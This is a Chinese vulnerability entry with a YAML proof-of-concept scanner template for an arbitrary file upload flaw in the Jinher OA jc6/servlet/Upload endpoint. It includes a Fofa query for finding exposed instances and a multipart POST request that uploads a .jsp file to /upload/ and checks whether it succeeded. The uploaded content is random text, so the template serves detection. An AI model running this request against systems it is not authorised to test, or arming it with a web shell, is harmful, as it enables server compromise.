漏洞描述
金和OA jc6/servlet/Upload接口存在任意文件上传漏洞。
Fofa: app="金和网络-金和OA"||body="/jc6/platform/sys/login"
jinher-jc6-servlet-upload-fileupload: 金和OA jc6/servlet/Upload接口存在任意文件上传漏洞
PoC代码[已公开]
id: jinher-jc6-servlet-upload-fileupload
info:
name: 金和OA jc6/servlet/Upload接口存在任意文件上传漏洞
author: zan8in
severity: critical
verified: true
description: |-
金和OA jc6/servlet/Upload接口存在任意文件上传漏洞。
Fofa: app="金和网络-金和OA"||body="/jc6/platform/sys/login"
reference:
- https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247485062&idx=1&sn=e28ca583776a495211c17c3ca4b4fbaa
tags: jinher,jc6,fileupload
created: 2024/01/16
set:
rboundary: randomLowercase(8)
filename: randomLowercase(6)
bodystr: randomLowercase(16)
rules:
r0:
request:
method: POST
path: /jc6/servlet/Upload?officeSaveFlag=0&dbimg=false&path=&setpath=/upload/
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"img\"; filename=\"{{filename}}.jsp\"\r\n\
Content-Type: image/jpeg\r\n\
\r\n\
{{bodystr}}\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: |
response.status == 200 &&
response.body.bcontains(b'arr[0]=parent.pubFileName') &&
response.body.bcontains(b'arr[1]=parent.pubBz') &&
response.body.bcontains(b"arr[2]='/upload/")
expression: r0()